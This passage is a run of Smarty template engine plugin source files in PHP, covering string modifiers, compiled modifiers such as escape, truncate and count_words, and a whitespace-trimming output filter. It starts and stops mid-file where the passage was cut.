function smarty_modifier_mb_wordwrap($str, $width = 75, $break = "\n", $cut = false)
{
    // break words into tokens using white space as a delimiter
    $tokens = preg_split('!(\s)!S' . Smarty::$_UTF8_MODIFIER, $str, -1, PREG_SPLIT_NO_EMPTY + PREG_SPLIT_DELIM_CAPTURE);
    $length = 0;
    $t = '';
    $_previous = false;
    $_space = false;
    foreach ($tokens as $_token) {
        $token_length = mb_strlen($_token, Smarty::$_CHARSET);
        $_tokens = array($_token);
        if ($token_length > $width) {
            if ($cut) {
                $_tokens = preg_split(
                    '!(.{' . $width . '})!S' . Smarty::$_UTF8_MODIFIER,
                    $_token,
                    -1,
                    PREG_SPLIT_NO_EMPTY + PREG_SPLIT_DELIM_CAPTURE
                );
            }
        }
        foreach ($_tokens as $token) {
            $_space = !!preg_match('!^\s$!S' . Smarty::$_UTF8_MODIFIER, $token);
            $token_length = mb_strlen($token, Smarty::$_CHARSET);
            $length += $token_length;
            if ($length > $width) {
                // remove space before inserted break
                if ($_previous) {
                    $t = mb_substr($t, 0, -1, Smarty::$_CHARSET);
                }
                if (!$_space) {
                    // add the break before the token
                    if (!empty($t)) {
                        $t .= $break;
                    }
                    $length = $token_length;
                }
            } elseif ($token === "\n") {
                // hard break must reset counters
                $length = 0;
            }
            $_previous = $_space;
            // add the token
            $t .= $token;
        }
    }
    return $t;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */

/**
 * Smarty number_format modifier plugin
 * Type:     modifier
 * Name:     number_format
 * Purpose:  Format a number with grouped thousands
 *
 * @param float|null  $num
 * @param int         $decimals
 * @param string|null $decimal_separator
 * @param string|null $thousands_separator
 *
 * @return string
 */
function smarty_modifier_number_format(?float $num, int $decimals = 0, ?string $decimal_separator = ".", ?string $thousands_separator = ",")
{
    // provide $num default to prevent deprecation errors in PHP >=8.1
    return number_format($num ?? 0.0, $decimals, $decimal_separator, $thousands_separator);
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */
/**
 * Smarty regex_replace modifier plugin
 * Type:     modifier
 * Name:     regex_replace
 * Purpose:  regular expression search/replace
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.regex.replace.php
 *          regex_replace (Smarty online manual)
 * @author Monte Ohrt <monte at ohrt dot com>
 *
 * @param string       $string  input string
 * @param string|array $search  regular expression(s) to search for
 * @param string|array $replace string(s) that should be replaced
 * @param int          $limit   the maximum number of replacements
 *
 * @return string
 */
function smarty_modifier_regex_replace($string, $search, $replace, $limit = -1)
{
    if (is_array($search)) {
        foreach ($search as $idx => $s) {
            $search[ $idx ] = _smarty_regex_replace_check($s);
        }
    } else {
        $search = _smarty_regex_replace_check($search);
    }
    return preg_replace($search, $replace, $string, $limit);
}

/**
 * @param  string $search string(s) that should be replaced
 *
 * @return string
 * @ignore
 */
function _smarty_regex_replace_check($search)
{
    // null-byte injection detection
    // anything behind the first null-byte is ignored
    if (($pos = strpos($search, "\0")) !== false) {
        $search = substr($search, 0, $pos);
    }
    // remove eval-modifier from $search
    if (preg_match('!([a-zA-Z\s]+)$!s', $search, $match) && (strpos($match[ 1 ], 'e') !== false)) {
        $search = substr($search, 0, -strlen($match[ 1 ])) . preg_replace('![e\s]+!', '', $match[ 1 ]);
    }
    return $search;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */
/**
 * Smarty replace modifier plugin
 * Type:     modifier
 * Name:     replace
 * Purpose:  simple search/replace
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.replace.php replace (Smarty online manual)
 * @author Monte Ohrt <monte at ohrt dot com>
 * @author Uwe Tews
 *
 * @param string $string  input string
 * @param string $search  text to search for
 * @param string $replace replacement text
 *
 * @return string
 */
function smarty_modifier_replace($string, $search, $replace)
{
    static $is_loaded = false;
    if (Smarty::$_MBSTRING) {
        if (!$is_loaded) {
            if (!is_callable('smarty_mb_str_replace')) {
                include_once SMARTY_PLUGINS_DIR . 'shared.mb_str_replace.php';
            }
            $is_loaded = true;
        }
        return smarty_mb_str_replace($search, $replace, $string);
    }
    return str_replace($search, $replace, $string);
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */
/**
 * Smarty spacify modifier plugin
 * Type:     modifier
 * Name:     spacify
 * Purpose:  add spaces between characters in a string
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.spacify.php spacify (Smarty online manual)
 * @author Monte Ohrt <monte at ohrt dot com>
 *
 * @param string $string       input string
 * @param string $spacify_char string to insert between characters.
 *
 * @return string
 */
function smarty_modifier_spacify($string, $spacify_char = ' ')
{
    // well… what about charsets besides latin and UTF-8?
    return implode($spacify_char, preg_split('//' . Smarty::$_UTF8_MODIFIER, $string, -1, PREG_SPLIT_NO_EMPTY));
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifier
 */
/**
 * Smarty truncate modifier plugin
 * Type:     modifier
 * Name:     truncate
 * Purpose:  Truncate a string to a certain length if necessary,
 *               optionally splitting in the middle of a word, and
 *               appending the $etc string or inserting $etc into the middle.
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.truncate.php truncate (Smarty online manual)
 * @author Monte Ohrt <monte at ohrt dot com>
 *
 * @param string  $string      input string
 * @param integer $length      length of truncated text
 * @param string  $etc         end string
 * @param boolean $break_words truncate at word boundary
 * @param boolean $middle      truncate in the middle of text
 *
 * @return string truncated string
 */
function smarty_modifier_truncate($string, $length = 80, $etc = '...', $break_words = false, $middle = false)
{
    if ($length === 0 || $string === null) {
        return '';
    }
    if (Smarty::$_MBSTRING) {
        if (mb_strlen($string, Smarty::$_CHARSET) > $length) {
            $length -= min($length, mb_strlen($etc, Smarty::$_CHARSET));
            if (!$break_words && !$middle) {
                $string = preg_replace(
                    '/\s+?(\S+)?$/' . Smarty::$_UTF8_MODIFIER,
                    '',
                    mb_substr($string, 0, $length + 1, Smarty::$_CHARSET)
                );
            }
            if (!$middle) {
                return mb_substr($string, 0, $length, Smarty::$_CHARSET) . $etc;
            }
            return mb_substr($string, 0, intval($length / 2), Smarty::$_CHARSET) . $etc .
                   mb_substr($string, -intval($length / 2), $length, Smarty::$_CHARSET);
        }
        return $string;
    }
    // no MBString fallback
    if (isset($string[ $length ])) {
        $length -= min($length, strlen($etc));
        if (!$break_words && !$middle) {
            $string = preg_replace('/\s+?(\S+)?$/', '', substr($string, 0, $length + 1));
        }
        if (!$middle) {
            return substr($string, 0, $length) . $etc;
        }
        return substr($string, 0, intval($length / 2)) . $etc . substr($string, -intval($length / 2));
    }
    return $string;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty cat modifier plugin
 * Type:     modifier
 * Name:     cat
 * Date:     Feb 24, 2003
 * Purpose:  catenate a value to a variable
 * Input:    string to catenate
 * Example:  {$var|cat:"foo"}
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.cat.php cat
 *           (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_cat($params)
{
    return '(' . implode(').(', $params) . ')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty count_characters modifier plugin
 * Type:     modifier
 * Name:     count_characters
 * Purpose:  count the number of characters in a text
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.count.characters.php count_characters (Smarty online
 *         manual)
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_count_characters($params)
{
    if (!isset($params[ 1 ]) || $params[ 1 ] !== 'true') {
        return 'preg_match_all(\'/[^\s]/' . Smarty::$_UTF8_MODIFIER . '\',' . $params[ 0 ] . ', $tmp)';
    }
    if (Smarty::$_MBSTRING) {
        return 'mb_strlen((string) ' . $params[ 0 ] . ', \'' . addslashes(Smarty::$_CHARSET) . '\')';
    }
    // no MBString fallback
    return 'strlen((string) ' . $params[ 0 ] . ')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty count_paragraphs modifier plugin
 * Type:     modifier
 * Name:     count_paragraphs
 * Purpose:  count the number of paragraphs in a text
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.count.paragraphs.php
 *          count_paragraphs (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_count_paragraphs($params)
{
    // count \r or \n characters
    return '(preg_match_all(\'#[\r\n]+#\', ' . $params[ 0 ] . ', $tmp)+1)';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty count_sentences modifier plugin
 * Type:     modifier
 * Name:     count_sentences
 * Purpose:  count the number of sentences in a text
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.count.paragraphs.php
 *          count_sentences (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_count_sentences($params)
{
    // find periods, question marks, exclamation marks with a word before but not after.
    return 'preg_match_all("#\w[\.\?\!](\W|$)#S' . Smarty::$_UTF8_MODIFIER . '", ' . $params[ 0 ] . ', $tmp)';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty count_words modifier plugin
 * Type:     modifier
 * Name:     count_words
 * Purpose:  count the number of words in a text
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.count.words.php count_words (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_count_words($params)
{
    if (Smarty::$_MBSTRING) {
        // return 'preg_match_all(\'#[\w\pL]+#' . Smarty::$_UTF8_MODIFIER . '\', ' . $params[0] . ', $tmp)';
        // expression taken from http://de.php.net/manual/en/function.str-word-count.php#85592
        return 'preg_match_all(\'/\p{L}[\p{L}\p{Mn}\p{Pd}\\\'\x{2019}]*/' . Smarty::$_UTF8_MODIFIER . '\', ' .
               $params[ 0 ] . ', $tmp)';
    }
    // no MBString fallback
    return 'str_word_count((string) ' . $params[ 0 ] . ')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty default modifier plugin
 * Type:     modifier
 * Name:     default
 * Purpose:  designate default value for empty variables
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.default.php default (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_default($params)
{
    $output = $params[ 0 ];
    if (!isset($params[ 1 ])) {
        $params[ 1 ] = "''";
    }
    array_shift($params);
    foreach ($params as $param) {
        $output = '(($tmp = ' . $output . ' ?? null)===null||$tmp===\'\' ? ' . $param . ' ?? null : $tmp)';
    }
    return $output;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty escape modifier plugin
 * Type:     modifier
 * Name:     escape
 * Purpose:  escape string for output
 *
 * @link   https://www.smarty.net/docsv2/en/language.modifier.escape count_characters (Smarty online manual)
 * @author Rodney Rehm
 *
 * @param array                                $params parameters
 * @param Smarty_Internal_TemplateCompilerBase $compiler
 *
 * @return string with compiled code
 * @throws SmartyException
 */
function smarty_modifiercompiler_escape($params, Smarty_Internal_TemplateCompilerBase $compiler)
{
    $compiler->template->_checkPlugins(
        array(
            array(
                'function' => 'smarty_literal_compiler_param',
                'file'     => SMARTY_PLUGINS_DIR . 'shared.literal_compiler_param.php'
            )
        )
    );
    try {
        $esc_type = smarty_literal_compiler_param($params, 1, 'html');
        $char_set = smarty_literal_compiler_param($params, 2, Smarty::$_CHARSET);
        $double_encode = smarty_literal_compiler_param($params, 3, true);
        if (!$char_set) {
            $char_set = Smarty::$_CHARSET;
        }
        switch ($esc_type) {
            case 'html':
                return 'htmlspecialchars((string)' . $params[ 0 ] . ', ENT_QUOTES, ' . var_export($char_set, true) . ', ' .
                    var_export($double_encode, true) . ')';
            // no break
            case 'htmlall':
                if (Smarty::$_MBSTRING) {
                    return 'htmlentities(mb_convert_encoding((string)' . $params[ 0 ] . ', \'UTF-8\', ' .
                        var_export($char_set, true) . '), ENT_QUOTES, \'UTF-8\', ' .
                        var_export($double_encode, true) . ')';
                }
                // no MBString fallback
                return 'htmlentities((string)' . $params[ 0 ] . ', ENT_QUOTES, ' . var_export($char_set, true) . ', ' .
                    var_export($double_encode, true) . ')';
            // no break
            case 'url':
                return 'rawurlencode((string)' . $params[ 0 ] . ')';
            case 'urlpathinfo':
                return 'str_replace("%2F", "/", rawurlencode((string)' . $params[ 0 ] . '))';
            case 'quotes':
                // escape unescaped single quotes
                return 'preg_replace("%(?<!\\\\\\\\)\'%", "\\\'", (string)' . $params[ 0 ] . ')';
            case 'javascript':
                // escape quotes and backslashes, newlines, etc.
                // see https://html.spec.whatwg.org/multipage/scripting.html#restrictions-for-contents-of-script-elements
                return 'strtr((string)' .
                       $params[ 0 ] .
                       ', array("\\\\" => "\\\\\\\\", "\'" => "\\\\\'", "\"" => "\\\\\"", "\\r" => "\\\\r", 
                       "\\n" => "\\\n", "</" => "<\/", "<!--" => "<\!--", "<s" => "<\s", "<S" => "<\S",
                       "`" => "\\\\`", "\${" => "\\\\\\$\\{"))';
        }
    } catch (SmartyException $e) {
        // pass through to regular plugin fallback
    }
    // could not optimize |escape call, so fallback to regular plugin
    if ($compiler->template->caching && ($compiler->tag_nocache | $compiler->nocache)) {
        $compiler->required_plugins[ 'nocache' ][ 'escape' ][ 'modifier' ][ 'file' ] =
            SMARTY_PLUGINS_DIR . 'modifier.escape.php';
        $compiler->required_plugins[ 'nocache' ][ 'escape' ][ 'modifier' ][ 'function' ] =
            'smarty_modifier_escape';
    } else {
        $compiler->required_plugins[ 'compiled' ][ 'escape' ][ 'modifier' ][ 'file' ] =
            SMARTY_PLUGINS_DIR . 'modifier.escape.php';
        $compiler->required_plugins[ 'compiled' ][ 'escape' ][ 'modifier' ][ 'function' ] =
            'smarty_modifier_escape';
    }
    return 'smarty_modifier_escape(' . join(', ', $params) . ')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty from_charset modifier plugin
 * Type:     modifier
 * Name:     from_charset
 * Purpose:  convert character encoding from $charset to internal encoding
 *
 * @author Rodney Rehm
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_from_charset($params)
{
    if (!Smarty::$_MBSTRING) {
        // FIXME: (rodneyrehm) shouldn't this throw an error?
        return $params[ 0 ];
    }
    if (!isset($params[ 1 ])) {
        $params[ 1 ] = '"ISO-8859-1"';
    }
    return 'mb_convert_encoding(' . $params[ 0 ] . ', "' . addslashes(Smarty::$_CHARSET) . '", ' . $params[ 1 ] . ')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty indent modifier plugin
 * Type:     modifier
 * Name:     indent
 * Purpose:  indent lines of text
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.indent.php indent (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_indent($params)
{
    if (!isset($params[ 1 ])) {
        $params[ 1 ] = 4;
    }
    if (!isset($params[ 2 ])) {
        $params[ 2 ] = "' '";
    }
    return 'preg_replace(\'!^!m\',str_repeat(' . $params[ 2 ] . ',' . $params[ 1 ] . '),' . $params[ 0 ] . ')';
}
<?php

/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
function smarty_modifiercompiler_json_encode($params) {
	return 'json_encode(' . $params[0] . (isset($params[1]) ? ', (int) ' . $params[1] : '') . ')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty lower modifier plugin
 * Type:     modifier
 * Name:     lower
 * Purpose:  convert string to lowercase
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.lower.php lower (Smarty online manual)
 * @author Monte Ohrt <monte at ohrt dot com>
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_lower($params)
{
    if (Smarty::$_MBSTRING) {
        return 'mb_strtolower((string) ' . $params[ 0 ] . ', \'' . addslashes(Smarty::$_CHARSET) . '\')';
    }
    // no MBString fallback
    return 'strtolower((string) ' . $params[ 0 ] . ')';
}
<?php

/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty nl2br modifier plugin
 * Type:     modifier
 * Name:     nl2br
 * Purpose:  insert HTML line breaks before all newlines in a string
 *
 * @link   https://www.smarty.net/docs/en/language.modifier.nl2br.tpl nl2br (Smarty online manual)
  *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_nl2br($params) {
    return 'nl2br((string) ' . $params[0] . ', (bool) ' . ($params[1] ?? true) . ')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty noprint modifier plugin
 * Type:     modifier
 * Name:     noprint
 * Purpose:  return an empty string
 *
 * @author Uwe Tews
 * @return string with compiled code
 */
function smarty_modifiercompiler_noprint()
{
    return "''";
}
<?php

/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty round modifier plugin
 * Type:     modifier
 * Name:     round
 * Purpose:  Returns the rounded value of num to specified precision (number of digits after the decimal point)
 *
 * @link   https://www.smarty.net/docs/en/language.modifier.round.tpl round (Smarty online manual)
  *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_round($params) {
    return 'round((float) ' . $params[0] . ', (int) ' . ($params[1] ?? 0) . ', (int) ' . ($params[2] ?? PHP_ROUND_HALF_UP) . ')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty string_format modifier plugin
 * Type:     modifier
 * Name:     string_format
 * Purpose:  format strings via sprintf
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.string.format.php string_format (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_string_format($params)
{
    return 'sprintf(' . $params[ 1 ] . ',' . $params[ 0 ] . ')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty strip modifier plugin
 * Type:     modifier
 * Name:     strip
 * Purpose:  Replace all repeated spaces, newlines, tabs
 *              with a single space or supplied replacement string.
 * Example:  {$var|strip} {$var|strip:"&nbsp;"}
 * Date:     September 25th, 2002
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.strip.php strip (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_strip($params)
{
    if (!isset($params[ 1 ])) {
        $params[ 1 ] = "' '";
    }
    return "preg_replace('!\s+!" . Smarty::$_UTF8_MODIFIER . "', {$params[1]},{$params[0]})";
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty strip_tags modifier plugin
 * Type:     modifier
 * Name:     strip_tags
 * Purpose:  strip html tags from text
 *
 * @link   https://www.smarty.net/docs/en/language.modifier.strip.tags.tpl strip_tags (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_strip_tags($params)
{
    if (!isset($params[ 1 ]) || $params[ 1 ] === true || trim($params[ 1 ], '"') === 'true') {
        return "preg_replace('!<[^>]*?>!', ' ', (string) {$params[0]})";
    } else {
        return 'strip_tags((string) ' . $params[ 0 ] . ')';
    }
}
<?php

/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty strlen modifier plugin
 * Type:     modifier
 * Name:     strlen
 * Purpose:  return the length of the given string
 *
 * @link   https://www.smarty.net/docs/en/language.modifier.strlen.tpl strlen (Smarty online manual)
  *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_strlen($params) {
    return 'strlen((string) ' . $params[0] . ')';
}
<?php

/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty str_repeat modifier plugin
 * Type:     modifier
 * Name:     str_repeat
 * Purpose:  returns string repeated times times
 *
 * @link   https://www.smarty.net/docs/en/language.modifier.str_repeat.tpl str_repeat (Smarty online manual)
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_str_repeat($params) {
    return 'str_repeat((string) ' . $params[0] . ', (int) ' . $params[1] . ')';
}
<?php

/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
function smarty_modifiercompiler_substr($params) {
	return 'substr((string) ' . $params[0] . ', (int) ' . $params[1] .
		(isset($params[2]) ? ', (int) ' . $params[2] : '') . ')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty to_charset modifier plugin
 * Type:     modifier
 * Name:     to_charset
 * Purpose:  convert character encoding from internal encoding to $charset
 *
 * @author Rodney Rehm
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_to_charset($params)
{
    if (!Smarty::$_MBSTRING) {
        // FIXME: (rodneyrehm) shouldn't this throw an error?
        return $params[ 0 ];
    }
    if (!isset($params[ 1 ])) {
        $params[ 1 ] = '"ISO-8859-1"';
    }
    return 'mb_convert_encoding(' . $params[ 0 ] . ', ' . $params[ 1 ] . ', "' . addslashes(Smarty::$_CHARSET) . '")';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty unescape modifier plugin
 * Type:     modifier
 * Name:     unescape
 * Purpose:  unescape html entities
 *
 * @author Rodney Rehm
 *
 * @param array $params parameters
 * @param Smarty_Internal_TemplateCompilerBase $compiler
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_unescape($params, Smarty_Internal_TemplateCompilerBase $compiler)
{
    $compiler->template->_checkPlugins(
        array(
            array(
                'function' => 'smarty_literal_compiler_param',
                'file'     => SMARTY_PLUGINS_DIR . 'shared.literal_compiler_param.php'
            )
        )
    );

    $esc_type = smarty_literal_compiler_param($params, 1, 'html');

    if (!isset($params[ 2 ])) {
        $params[ 2 ] = '\'' . addslashes(Smarty::$_CHARSET) . '\'';
    }

    switch ($esc_type) {
        case 'entity':
        case 'htmlall':
            if (Smarty::$_MBSTRING) {
                return 'html_entity_decode(mb_convert_encoding(' . $params[ 0 ] . ', ' . $params[ 2 ] . ', \'UTF-8\'), ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401, ' . $params[ 2 ] . ')';
            }
            return 'html_entity_decode(' . $params[ 0 ] . ', ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401, ' . $params[ 2 ] . ')';
        case 'html':
            return 'htmlspecialchars_decode(' . $params[ 0 ] . ', ENT_QUOTES)';
        case 'url':
            return 'rawurldecode(' . $params[ 0 ] . ')';
        default:
            return $params[ 0 ];
    }
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty upper modifier plugin
 * Type:     modifier
 * Name:     lower
 * Purpose:  convert string to uppercase
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.upper.php lower (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_upper($params)
{
    if (Smarty::$_MBSTRING) {
        return 'mb_strtoupper((string) ' . $params[ 0 ] . ' ?? \'\', \'' . addslashes(Smarty::$_CHARSET) . '\')';
    }
    // no MBString fallback
    return 'strtoupper((string) ' . $params[ 0 ] . ' ?? \'\')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsModifierCompiler
 */
/**
 * Smarty wordwrap modifier plugin
 * Type:     modifier
 * Name:     wordwrap
 * Purpose:  wrap a string of text at a given length
 *
 * @link   https://www.smarty.net/manual/en/language.modifier.wordwrap.php wordwrap (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array                                 $params parameters
 * @param \Smarty_Internal_TemplateCompilerBase $compiler
 *
 * @return string with compiled code
 * @throws \SmartyException
 */
function smarty_modifiercompiler_wordwrap($params, Smarty_Internal_TemplateCompilerBase $compiler)
{
    if (!isset($params[ 1 ])) {
        $params[ 1 ] = 80;
    }
    if (!isset($params[ 2 ])) {
        $params[ 2 ] = '"\n"';
    }
    if (!isset($params[ 3 ])) {
        $params[ 3 ] = 'false';
    }
    $function = 'wordwrap';
    if (Smarty::$_MBSTRING) {
        $function = $compiler->getPlugin('mb_wordwrap', 'modifier');
    }
    return $function . '(' . $params[ 0 ] . ',' . $params[ 1 ] . ',' . $params[ 2 ] . ',' . $params[ 3 ] . ')';
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFilter
 */
/**
 * Smarty trimwhitespace outputfilter plugin
 * Trim unnecessary whitespace from HTML markup.
 *
 * @author Rodney Rehm
 *
 * @param string $source input string
 *
 * @return string filtered output
 * @todo   substr_replace() is not overloaded by mbstring.func_overload - so this function might fail!
 */
function smarty_outputfilter_trimwhitespace($source)
{
    $store = array();
    $_store = 0;
    $_offset = 0;
    // Unify Line-Breaks to \n
    $source = preg_replace('/\015\012|\015|\012/', "\n", $source);
    // capture Internet Explorer and KnockoutJS Conditional Comments
    if (preg_match_all(
        '#<!--((\[[^\]]+\]>.*?<!\[[^\]]+\])|(\s*/?ko\s+.+))-->#is',
        $source,
        $matches,
        PREG_OFFSET_CAPTURE | PREG_SET_ORDER
    )
    ) {
        foreach ($matches as $match) {
            $store[] = $match[ 0 ][ 0 ];
            $_length = strlen($match[ 0 ][ 0 ]);
            $replace = '@!@SMARTY:' . $_store . ':SMARTY@!@';
            $source = substr_replace($source, $replace, $match[ 0 ][ 1 ] - $_offset, $_length);
            $_offset += $_length - strlen($replace);
            $_store++;
        }
    }
    // Strip all HTML-Comments
    // yes, even the ones in <script> - see https://stackoverflow.com/a/808850/515124
    $source = preg_replace('#<!--.*?-->#ms', '', $source);
    // capture html elements not to be messed with
    $_offset = 0;
    if (preg_match_all(
        '#(<script[^>]*>.*?</script[^>]*>)|(<textarea[^>]*>.*?</textarea[^>]*>)|(<pre[^>]*>.*?</pre[^>]*>)#is',
        $source,
        $matches,
        PREG_OFFSET_CAPTURE | PREG_SET_ORDER
    )
    ) {
        foreach ($matches as $match) {
            $store[] = $match[ 0 ][ 0 ];
            $_length = strlen($match[ 0 ][ 0 ]);
            $replace = '@!@SMARTY:' . $_store . ':SMARTY@!@';
            $source = substr_replace($source, $replace, $match[ 0 ][ 1 ] - $_offset, $_length);
            $_offset += $_length - strlen($replace);
            $_store++;
        }
    }
    $expressions = array(// replace multiple spaces between tags by a single space
                         // can't remove them entirely, because that might break poorly implemented CSS display:inline-block elements
                         '#(:SMARTY@!@|>)\s+(?=@!@SMARTY:|<)#s'                                    => '\1 \2',
                         // remove spaces between attributes (but not in attribute values!)
                         '#(([a-z0-9]\s*=\s*("[^"]*?")|(\'[^\']*?\'))|<[a-z0-9_]+)\s+([a-z/>])#is' => '\1 \5',
                         // note: for some very weird reason trim() seems to remove spaces inside attributes.
                         // maybe a \0 byte or something is interfering?
                         '#^\s+<#Ss'                                                               => '<',
                         '#>\s+$#Ss'                                                               => '>',
    );
    $source = preg_replace(array_keys($expressions), array_values($expressions), $source);
    // note: for some very weird reason trim() seems to remove spaces inside attributes.
    // maybe a \0 byte or something is interfering?
    // $source = trim( $source );
    $_offset = 0;
    if (preg_match_all('#@!@SMARTY:([0-9]+):SMARTY@!@#is', $source, $matches, PREG_OFFSET_CAPTURE | PREG_SET_ORDER)) {
        foreach ($matches as $match) {
            $_length = strlen($match[ 0 ][ 0 ]);
            $replace = $store[ $match[ 1 ][ 0 ] ];
            $source = substr_replace($source, $replace, $match[ 0 ][ 1 ] + $_offset, $_length);
            $_offset += strlen($replace) - $_length;
            $_store++;
        }
    }
    return $source;
}
<?php
/**
 * Smarty shared plugin
 *
 * @package    Smarty
 * @subpackage PluginsShared
 */
/**
 * escape_special_chars common function
 * Function: smarty_function_escape_special_chars
 * Purpose:  used by other smarty functions to escape
 *           special chars except for already escaped ones
 *
 * @author Monte Ohrt <monte at ohrt dot com>
 *
 * @param string $string text that should by escaped
 *
 * @return string
 */
function smarty_function_escape_special_chars($string)
{
    if (!is_array($string)) {
        $string = htmlspecialchars((string) $string, ENT_COMPAT, Smarty::$_CHARSET, false);
    }
    return $string;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsShared
 */
/**
 * evaluate compiler parameter
 *
 * @param array   $params  parameter array as given to the compiler function
 * @param integer $index   array index of the parameter to convert
 * @param mixed   $default value to be returned if the parameter is not present
 *
 * @return mixed evaluated value of parameter or $default
 * @throws SmartyException if parameter is not a literal (but an expression, variable, …)
 * @author Rodney Rehm
 */
function smarty_literal_compiler_param($params, $index, $default = null)
{
    // not set, go default
    if (!isset($params[ $index ])) {
        return $default;
    }
    // test if param is a literal
